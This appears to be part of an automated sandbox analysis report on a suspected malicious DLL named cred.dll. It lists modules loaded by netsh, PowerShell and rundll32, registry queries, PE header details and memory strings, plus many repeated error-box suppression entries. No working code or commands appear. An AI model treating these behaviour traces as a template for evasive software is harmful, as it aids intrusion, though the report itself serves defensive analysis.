    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcsvc.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshhttp.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: httpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshipsec.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: activeds.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: polstore.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winipsec.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshwfp.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cabinet.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2p.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rpcnsh.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: whhelper.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlanapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wshelper.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wevtapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: peerdistsh.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wcmapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rmclient.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mobilenetworking.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: slc.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: sppc.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ktmw32.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprmsg.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\netsh.exe Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
    Source: Window Recorder Window detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
    Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office
    Source: cred.dll Static file information: File size 1087488 > 1048576
    Source: cred.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: cred.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: cred.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: cred.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: cred.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: cred.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: cred.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
    Source: cred.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1609053590.00000182F7A5E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000C.00000002.1607601534.00000182F7A28000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1737048293.0000019048DCA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ows\dll\mscorlib.pdbA8? source: powershell.exe, 0000000C.00000002.1606498294.00000182F79EA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000002.1609053590.00000182F7A5E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1738172284.0000019048E1B000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000C.00000002.1608151993.00000182F7A2E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: lib.pdb source: powershell.exe, 0000000C.00000002.1606498294.00000182F79EA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1605350402.00000182F79CD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb2 source: powershell.exe, 00000014.00000002.1736383296.0000019048D95000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: softy.pdbt` source: powershell.exe, 0000000C.00000002.1608151993.00000182F7A2E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.1736383296.0000019048D95000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.1732572937.0000019048AE5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer3281DD402BA65B9201D60593E96C492651E889CC13F1415EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC9F596836F97C8F74750E5975C64E2189F source: powershell.exe, 00000014.00000002.1732572937.0000019048AE5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000014.00000002.1737048293.0000019048DCA000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.1737664936.0000019048E11000.00000004.00000020.00020000.00000000.sdmp
    Source: cred.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: cred.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: cred.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: cred.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: cred.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFB4B05121D pushad ; ret 11_2_00007FFB4B051262
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFB4B06791E push 0000006Eh; iretd 11_2_00007FFB4B067924
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFB4B065DAE push ss; retf 11_2_00007FFB4B065DB2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFB4B0665DE push cs; retf 11_2_00007FFB4B0665DF
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFB4B065E0C push ss; retf 11_2_00007FFB4B065E0D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFB4B065632 push ds; retf 11_2_00007FFB4B065633
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFB4B066639 push cs; retf 11_2_00007FFB4B06663A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFB4B065E64 push ss; retf 11_2_00007FFB4B065E68

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
